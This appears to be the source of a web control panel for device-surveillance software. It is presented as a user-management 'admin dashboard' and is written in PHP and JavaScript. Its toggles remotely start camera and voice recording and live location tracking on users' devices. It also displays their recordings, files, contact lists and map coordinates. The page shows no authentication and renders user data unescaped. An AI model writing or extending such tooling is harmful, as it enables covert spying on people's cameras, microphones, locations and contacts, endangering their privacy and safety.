<?php
// admin.php - A single-file, comprehensive admin dashboard to manage users and view their data.

// --- CONFIGURATION & DATABASE CONNECTION ---
// Make sure this path is correct and points to your database configuration file.
require_once '../config/database.php';

// --- HELPER FUNCTIONS ---

/**
 * Generates a thumbnail for an image or video file with robust error handling.
 * @param string $sourcePath The absolute path to the source file.
 * @param string $thumbPath The absolute path where the thumbnail will be saved.
 * @param string $type 'image' or 'video'.
 * @return bool True on success, false on failure.
 */
function generateThumbnail($sourcePath, $thumbPath, $type = 'image') {
    if (file_exists($thumbPath)) return true;
    if (!file_exists($sourcePath) || filesize($sourcePath) === 0) return false;

    $thumbDir = dirname($thumbPath);
    if (!is_dir($thumbDir)) {
        if (!is_writable(dirname($thumbDir))) return false;
        mkdir($thumbDir, 0755, true);
    }

    if ($type === 'image' && function_exists('gd_info')) {
        try {
            $sourceImage = @imagecreatefromstring(file_get_contents($sourcePath));
            if (!$sourceImage) return false;
            
            list($width, $height) = getimagesize($sourcePath);
            $thumb = imagecreatetruecolor(150, 150);
            imagecopyresampled($thumb, $sourceImage, 0, 0, 0, 0, 150, 150, $width, $height);
            imagejpeg($thumb, $thumbPath);
            imagedestroy($sourceImage);
            imagedestroy($thumb);
            return true;
        } catch (Exception $e) {
            return false;
        }
    } elseif ($type === 'video') {
        $ffmpeg_path = `which ffmpeg`; 
        if (!empty($ffmpeg_path)) {
            $cmd = escapeshellcmd(trim($ffmpeg_path)) . " -i " . escapeshellarg($sourcePath) . " -ss 00:00:01.000 -vframes 1 -vf scale=150:-1 " . escapeshellarg($thumbPath);
            @shell_exec($cmd);
            return file_exists($thumbPath);
        }
    }
    return false;
}

function getUsers($pdo) {
    $sql = "
        SELECT 
            u.id, u.email, u.username, u.created_at,
            a.isOnline, a.isCamRecording, a.isVoiceRecording, a.isLocationLive,
            a.latitude, a.longitude, a.location_updated_at, a.updated_at as action_updated_at
        FROM users u
        LEFT JOIN actions a ON u.id = a.user_id
        ORDER BY u.created_at DESC
    ";
    $stmt = $pdo->prepare($sql);
    $stmt->execute();
    $users = $stmt->fetchAll(PDO::FETCH_ASSOC);

    foreach ($users as &$user) {
        $user['isOnline'] = (bool) $user['isOnline'];
        $user['isCamRecording'] = (bool) $user['isCamRecording'];
        $user['isVoiceRecording'] = (bool) $user['isVoiceRecording'];
        $user['isLocationLive'] = (bool) $user['isLocationLive'];
    }
    return $users;
}

function getUserFiles($pdo, $userId) {
    $stmt = $pdo->prepare("SELECT * FROM files WHERE user_id = ? ORDER BY created_at DESC");
    $stmt->execute([$userId]);
    $files = $stmt->fetchAll(PDO::FETCH_ASSOC);
    
    $categorizedFiles = [
        'All' => [], 'Images' => [], 'Video Recordings' => [], 'Voice Recordings' => [],
        'Videos' => [], 'Documents' => [], 'Audio' => [], 'Archives' => [], 'Contacts' => []
    ];
    
    foreach ($files as &$file) {
        $webPath = '';
        $uploadsPos = strpos($file['file_path'], 'uploads/');
        $webPath = ($uploadsPos !== false) ? substr($file['file_path'], $uploadsPos) : '';

        $file['web_path'] = $webPath;
        $file['thumbnail_path'] = null;

        $thumbDir = dirname($file['file_path']) . '/.thumbs';
        $thumbName = pathinfo($file['file_name'], PATHINFO_FILENAME) . '.jpg';
        $thumbPath = $thumbDir . '/' . $thumbName;

        if ($file['file_type'] === 'image' || $file['file_type'] === 'video') {
             if (generateThumbnail($file['file_path'], $thumbPath, $file['file_type'])) {
                $thumbUploadsPos = strpos($thumbPath, 'uploads/');
                $file['thumbnail_path'] = ($thumbUploadsPos !== false) ? substr($thumbPath, $thumbUploadsPos) : '';
            }
        }
        
        $categorizedFiles['All'][] = $file;
        if (strpos($file['file_path'], 'videoRecordings') !== false) {
            $categorizedFiles['Video Recordings'][] = $file;
        } elseif (strpos($file['file_path'], 'voiceRecordings') !== false) {
            $categorizedFiles['Voice Recordings'][] = $file;
        } elseif ($file['file_type'] == 'image') {
            $categorizedFiles['Images'][] = $file;
        } elseif ($file['file_type'] == 'video') {
            $categorizedFiles['Videos'][] = $file;
        } elseif ($file['file_type'] == 'audio') {
            $categorizedFiles['Audio'][] = $file;
        } elseif ($file['file_type'] == 'archive') {
            $categorizedFiles['Archives'][] = $file;
        } else if ($file['file_type'] == 'document' || $file['file_type'] == 'other') {
            $categorizedFiles['Documents'][] = $file;
        }
    }
    
    $stmt = $pdo->prepare("SELECT * FROM contacts WHERE user_id = ? ORDER BY created_at DESC");
    $stmt->execute([$userId]);
    $contacts = $stmt->fetchAll(PDO::FETCH_ASSOC);
    $categorizedFiles['Contacts'] = $contacts;
    if (!empty($contacts)) {
      $categorizedFiles['All'] = array_merge($categorizedFiles['All'], $contacts);
    }

    return $categorizedFiles;
}

function updateUserAction($pdo, $userId, $action, $value) {
    $allowedActions = ['isCamRecording', 'isVoiceRecording', 'isLocationLive'];
    if (!in_array($action, $allowedActions)) return false;
    $sanitizedValue = (int)(bool)$value;
    $sql = "UPDATE actions SET {$action} = ?, updated_at = NOW() WHERE user_id = ?";
    $stmt = $pdo->prepare($sql);
    return $stmt->execute([$sanitizedValue, $userId]);
}

if (!empty($_GET['action'])) {
    error_reporting(0);
    ini_set('display_errors', 0);
    header('Content-Type: application/json');
    $database = new Database();
    $pdo = $database->getConnection();
    $action = $_GET['action'];
    try {
        switch ($action) {
            case 'get_user_files':
                $userId = isset($_GET['user_id']) ? (int)$_GET['user_id'] : 0;
                echo json_encode($userId > 0 ? ['success' => true, 'files' => getUserFiles($pdo, $userId)] : ['success' => false, 'error' => 'Invalid user ID.']);
                break;
            case 'update_action':
                $data = json_decode(file_get_contents('php://input'), true);
                $userId = $data['user_id'] ?? 0;
                $actionToUpdate = $data['action'] ?? '';
                $value = $data['value'] ?? 0;
                if ($userId > 0 && !empty($actionToUpdate)) {
                    echo json_encode(updateUserAction($pdo, $userId, $actionToUpdate, $value) ? ['success' => true] : ['success' => false, 'error' => 'Failed to update action.']);
                } else {
                    echo json_encode(['success' => false, 'error' => 'Invalid data.']);
                }
                break;
            default:
                echo json_encode(['success' => false, 'error' => 'Invalid action.']);
        }
    } catch (Exception $e) {
        error_log('Admin API Error: ' . $e->getMessage());
        echo json_encode(['success' => false, 'error' => 'A server error occurred.']);
    }
    exit;
}

$database = new Database();
$pdo = $database->getConnection();
$initialUsers = getUsers($pdo);
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Admin Dashboard</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" rel="stylesheet">
    <style>
        body { font-family: 'Inter', sans-serif; }
        .dark-mode { background-color: #111827; color: #d1d5db; }
        .sidebar { background-color: #1f2937; }
        .main-content { background-color: #111827; }
        .card { background-color: #1f2937; border: 1px solid #374151; }
        .btn-control { transition: all 0.2s ease-in-out; border: 1px solid #4b5563; }
        .btn-control.active { background-color: #10b981; color: white; border-color: #10b981; box-shadow: 0 0 15px rgba(16, 185, 129, 0.5); }
        .btn-control.inactive { background-color: #374151; }
        .user-card.selected { background-color: #3b82f6; border-color: #60a5fa; }
        .tab.active { color: #60a5fa; border-bottom-color: #60a5fa; }
        #media-modal { display: none; }
        .thumbnail { width: 100%; height: 120px; object-fit: cover; background-color: #374151; }
    </style>
</head>
<body class="dark-mode">
    <div class="flex h-screen">
        <aside class="sidebar w-1/4 p-4 overflow-y-auto">
            <h1 class="text-2xl font-bold mb-4">Users</h1>
            <input type="text" id="search-users" placeholder="Search by email..." class="w-full p-2 mb-4 bg-gray-800 rounded border border-gray-600">
            <div id="user-list"></div>
        </aside>

        <main id="main-content-area" class="main-content flex-1 p-8 overflow-y-auto">
            <div id="welcome-message" class="text-center text-gray-400">
                <i class="fas fa-users text-6xl mb-4"></i>
                <h2 class="text-3xl">Welcome to the Dashboard</h2>
                <p>Select a user to view their data.</p>
            </div>
            <div id="user-details-container" class="hidden"></div>
        </main>
    </div>

    <div id="media-modal" class="fixed inset-0 bg-black bg-opacity-75 flex items-center justify-center p-4 z-50">
        <div class="bg-gray-900 p-4 rounded-lg max-w-5xl max-h-[90vh] w-full h-full relative flex flex-col">
            <button id="close-modal" class="absolute top-2 right-4 text-white text-3xl z-20">&times;</button>
            <div id="modal-content" class="w-full h-full flex-grow flex items-center justify-center"></div>
        </div>
    </div>

    <script>
        const allUsers = <?php echo json_encode($initialUsers); ?>;
        let selectedUserId = null;
        let timers = {};

        document.addEventListener('DOMContentLoaded', () => {
            renderUserList(allUsers);
            document.getElementById('user-list').addEventListener('click', handleUserSelection);
            document.getElementById('search-users').addEventListener('input', (e) => {
                const searchTerm = e.target.value.toLowerCase();
                renderUserList(allUsers.filter(user => user.email.toLowerCase().includes(searchTerm)));
            });
            document.getElementById('close-modal').addEventListener('click', () => document.getElementById('media-modal').style.display = 'none');
        });

        function handleUserSelection(e) {
            const userCard = e.target.closest('.user-card');
            if (userCard && userCard.dataset.userId) {
                selectUser(parseInt(userCard.dataset.userId, 10));
            }
        }
        
        function renderUserList(users) {
            const userListEl = document.getElementById('user-list');
            userListEl.innerHTML = users.map(user => `
                <div id="user-card-${user.id}" class="user-card card p-4 mb-2 rounded-lg cursor-pointer hover:bg-gray-700 transition" data-user-id="${user.id}">
                    <div class="flex justify-between items-center">
                        <div>
                            <p class="font-bold truncate">${user.email}</p>
                            <p class="text-sm text-gray-400">Joined: ${new Date(user.created_at).toLocaleDateString()}</p>
                        </div>
                        <span class="h-3 w-3 rounded-full flex-shrink-0 ${user.isOnline ? 'bg-green-500' : 'bg-red-500'}" title="${user.isOnline ? 'Online' : 'Offline'}"></span>
                    </div>
                </div>
            `).join('');
        }
        
        async function selectUser(userId) {
            document.querySelectorAll('.user-card').forEach(card => card.classList.remove('selected'));
            document.getElementById(`user-card-${userId}`)?.classList.add('selected');

            selectedUserId = userId;
            const selectedUser = allUsers.find(u => u.id == userId);
            
            if (selectedUser) {
                document.getElementById('welcome-message').classList.add('hidden');
                const container = document.getElementById('user-details-container');
                container.classList.remove('hidden');
                renderUserDetails(selectedUser);

                const galleriesEl = document.getElementById('file-galleries');
                if(galleriesEl) galleriesEl.innerHTML = '<p class="text-center mt-8">Loading files...</p>';

                try {
                    const response = await fetch(`?action=get_user_files&user_id=${userId}`);
                    if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
                    
                    const data = await response.json();
                    if (data.success) {
                        renderFileGalleries(data.files);
                    } else {
                        if(galleriesEl) galleriesEl.innerHTML = `<p class="text-center text-red-500 mt-8">Error: ${data.error || 'Could not load files.'}</p>`;
                    }
                } catch (error) {
                    console.error("Fetch error:", error);
                    if(galleriesEl) galleriesEl.innerHTML = `<p class="text-center text-red-500 mt-8">Error fetching files. Check the console for details.</p>`;
                }
            }
        }

        function renderUserDetails(user) {
            const mapsLink = user.latitude && user.longitude ? `https://www.google.com/maps?q=${user.latitude},${user.longitude}` : '#';
            const locationTime = user.location_updated_at ? new Date(user.location_updated_at).toLocaleString() : 'N/A';

            document.getElementById('user-details-container').innerHTML = `
                <div class="card p-6 rounded-lg mb-8">
                    <h2 class="text-2xl font-bold mb-4">${user.email}</h2>
                    <div class="grid grid-cols-1 md:grid-cols-3 gap-6">
                        <div id="cam-btn-container" class="btn-control p-4 rounded-lg flex flex-col items-center justify-center ${user.isCamRecording ? 'active' : 'inactive'}">
                            <button onclick="toggleAction(${user.id}, 'isCamRecording', ${user.isCamRecording ? 0 : 1})">
                                <i class="fas fa-video text-4xl mb-2"></i>
                                <span class="text-lg font-semibold">${user.isCamRecording ? 'Stop' : 'Start'} Camera</span>
                            </button>
                            <span id="cam-timer" class="text-sm mt-1"></span>
                        </div>
                        <div id="voice-btn-container" class="btn-control p-4 rounded-lg flex flex-col items-center justify-center ${user.isVoiceRecording ? 'active' : 'inactive'}">
                            <button onclick="toggleAction(${user.id}, 'isVoiceRecording', ${user.isVoiceRecording ? 0 : 1})">
                                <i class="fas fa-microphone text-4xl mb-2"></i>
                                <span class="text-lg font-semibold">${user.isVoiceRecording ? 'Stop' : 'Start'} Voice</span>
                            </button>
                            <span id="voice-timer" class="text-sm mt-1"></span>
                        </div>
                        <div class="p-4 rounded-lg flex flex-col items-center justify-center inactive">
                            <button onclick="toggleAction(${user.id}, 'isLocationLive', ${user.isLocationLive ? 0 : 1})" class="btn-control w-full mb-2 ${user.isLocationLive ? 'active' : 'inactive'}">
                                ${user.isLocationLive ? 'Disable' : 'Enable'} Live Location
                            </button>
                             <a href="${mapsLink}" target="_blank" class="btn-control w-full text-center">View on Map</a>
                             <span class="text-xs text-gray-400 mt-1">Last Update: ${locationTime}</span>
                        </div>
                    </div>
                </div>
                <div id="file-galleries"></div>
            `;
            updateTimer('cam', user.isCamRecording, user.action_updated_at);
            updateTimer('voice', user.isVoiceRecording, user.action_updated_at);
        }
        
        function renderFileGalleries(files) {
            const galleriesEl = document.getElementById('file-galleries');
            const tabs = Object.keys(files).filter(cat => files[cat] && files[cat].length > 0);
            
            galleriesEl.innerHTML = `
                <div class="border-b border-gray-700">
                    <nav id="tabs-nav" class="-mb-px flex space-x-8 overflow-x-auto" aria-label="Tabs">
                        ${tabs.map((tab, index) => `<button class="tab whitespace-nowrap py-4 px-1 border-b-2 font-medium text-sm ${index === 0 ? 'active' : ''}" onclick="showTabContent('${tab.replace(/\s+/g, '-')}')">${tab}</button>`).join('')}
                    </nav>
                </div>
                <div id="tabs-content" class="mt-4">
                    ${tabs.map((tab, index) => `
                        <div id="${tab.replace(/\s+/g, '-')}-content" class="tab-content ${index > 0 ? 'hidden' : ''}">
                            <input type="text" class="w-full p-2 mb-4 bg-gray-800 rounded border border-gray-600" placeholder="Search in ${tab}..." oninput="filterGallery('${tab.replace(/\s+/g, '-')}', this.value)">
                            ${renderGalleryContent(tab, files[tab])}
                        </div>
                    `).join('')}
                </div>
            `;
        }

        function renderGalleryContent(category, items) {
             if (category === 'Contacts') {
                return `<div class="card p-4 rounded-lg gallery-grid">
                    <table class="w-full text-left">
                        <thead><tr><th>Name</th><th>Phone</th><th>Email</th></tr></thead>
                        <tbody>${items.map(item => `<tr class="border-t border-gray-700 gallery-item" data-filter-text="${(item.contact_name || '')}${(item.phone_number || '')}${(item.email || '')}".toLowerCase()}><td class="p-2">${item.contact_name || 'N/A'}</td><td>${item.phone_number || 'N/A'}</td><td>${item.email || 'N/A'}</td></tr>`).join('')}</tbody>
                    </table></div>`;
            }
            return `<div class="grid grid-cols-2 md:grid-cols-4 lg:grid-cols-6 gap-4 gallery-grid">
                ${items.map(item => renderFileThumbnail(item)).join('')}
            </div>`;
        }
        
        /**
         * [FIXED] This function now safely handles both file and contact objects.
         */
        function renderFileThumbnail(item) {
            // It's a contact object
            if (item.hasOwnProperty('contact_name')) {
                const contact = item;
                const filterText = `${contact.contact_name || ''} ${contact.phone_number || ''} ${contact.email || ''}`.toLowerCase();
                return `
                    <div class="card p-2 rounded-lg text-center gallery-item" data-filter-text="${filterText}">
                        <i class="fas fa-address-book text-5xl text-green-400 mt-4 mb-2"></i>
                        <p class="text-xs truncate mt-2 font-bold">${contact.contact_name || 'No Name'}</p>
                        <p class="text-xs truncate text-gray-400">${contact.phone_number || 'No Phone'}</p>
                    </div>
                `;
            }

            // It's a file object
            const file = item;
            const webPath = file.web_path;
            const thumbPath = file.thumbnail_path;
            
            let iconClass = 'fas fa-file-alt';
            let mediaType = 'document';
            if (file.file_type === 'image') { iconClass = 'fas fa-image'; mediaType = 'image'; }
            if (file.file_type === 'video') { iconClass = 'fas fa-file-video'; mediaType = 'video'; }
            if (file.file_type === 'audio') { iconClass = 'fas fa-file-audio'; mediaType = 'audio'; }
            if (file.file_path && file.file_path.includes('voiceRecordings')) { iconClass = 'fas fa-microphone-alt'; mediaType = 'audio'; }
            if (file.file_path && file.file_path.includes('videoRecordings')) { iconClass = 'fas fa-video'; mediaType = 'video'; }
            
            return `
                <div class="card p-2 rounded-lg text-center cursor-pointer gallery-item" data-filter-text="${file.file_name.toLowerCase()}" onclick="viewMedia('${webPath}', '${mediaType}')">
                    ${thumbPath ? `<img src="${thumbPath}" class="thumbnail rounded-md" alt="thumbnail" onerror="this.parentElement.querySelector('i').style.display='block'; this.style.display='none'"/>` : ''}
                    <i class="${iconClass} text-5xl text-blue-400 mt-4 mb-2" ${thumbPath ? 'style="display:none;"' : ''}></i>
                    <p class="text-xs truncate mt-2">${file.file_name}</p>
                </div>
            `;
        }

        async function toggleAction(userId, action, value) {
            try {
                const response = await fetch(`?action=update_action`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ user_id: userId, action, value })
                });
                const result = await response.json();
                if (result.success) {
                    const userIndex = allUsers.findIndex(u => u.id == userId);
                    if (userIndex !== -1) {
                        allUsers[userIndex][action] = !!value;
                        allUsers[userIndex].action_updated_at = new Date().toISOString();
                        if (selectedUserId === userId) selectUser(userId);
                    }
                } else {
                    alert('Error: ' + result.error);
                }
            } catch (error) {
                alert('A network error occurred.');
            }
        }
        
        function viewMedia(path, type) {
            const modal = document.getElementById('media-modal');
            const contentEl = document.getElementById('modal-content');
            let contentHtml = '';
            
            const fullUrl = window.location.origin + window.location.pathname.replace('admin.php', '') + path;

            if (type === 'image') contentHtml = `<img src="${fullUrl}" class="max-w-full max-h-full object-contain">`;
            else if (type === 'video') contentHtml = `<video controls autoplay class="max-w-full max-h-full"><source src="${fullUrl}"></video>`;
            else if (type === 'audio') contentHtml = `<audio controls autoplay class="w-full"><source src="${fullUrl}"></audio>`;
            else {
                const viewerUrl = `https://docs.google.com/gview?url=${encodeURIComponent(fullUrl)}&embedded=true`;
                contentHtml = `<iframe src="${viewerUrl}" class="w-full h-full" frameborder="0"></iframe>`;
            }
            contentEl.innerHTML = contentHtml + `<a href="${fullUrl}" download class="absolute bottom-4 right-4 bg-blue-500 text-white py-2 px-4 rounded hover:bg-blue-600"><i class="fas fa-download mr-2"></i>Download</a>`;
            modal.style.display = 'flex';
        }

        function showTabContent(tabId) {
            document.querySelectorAll('.tab-content').forEach(el => el.classList.add('hidden'));
            document.getElementById(`${tabId}-content`)?.classList.remove('hidden');
            document.querySelectorAll('.tab').forEach(el => el.classList.remove('active'));
            document.querySelector(`button[onclick="showTabContent('${tabId}')"]`)?.classList.add('active');
        }

        function filterGallery(galleryId, searchTerm) {
            const gallery = document.getElementById(`${galleryId}-content`);
            gallery.querySelectorAll('.gallery-item').forEach(item => {
                const filterText = item.dataset.filterText || '';
                item.style.display = filterText.includes(searchTerm.toLowerCase()) ? '' : 'none';
            });
        }
        
        function updateTimer(type, isActive, startTime) {
            clearInterval(timers[type]);
            const timerEl = document.getElementById(`${type}-timer`);
            if (isActive && startTime && timerEl) {
                const start = new Date(startTime).getTime();
                timers[type] = setInterval(() => {
                    const now = new Date().getTime();
                    const diff = now - start;
                    const hours = Math.floor(diff / 3600000);
                    const minutes = Math.floor((diff % 3600000) / 60000);
                    const seconds = Math.floor((diff % 60000) / 1000);
                    timerEl.textContent = `Recording: ${hours.toString().padStart(2, '0')}:${minutes.toString().padStart(2, '0')}:${seconds.toString().padStart(2, '0')}`;
                }, 1000);
            } else if(timerEl) {
                timerEl.textContent = '';
            }
        }
    </script>
</body>
</html>

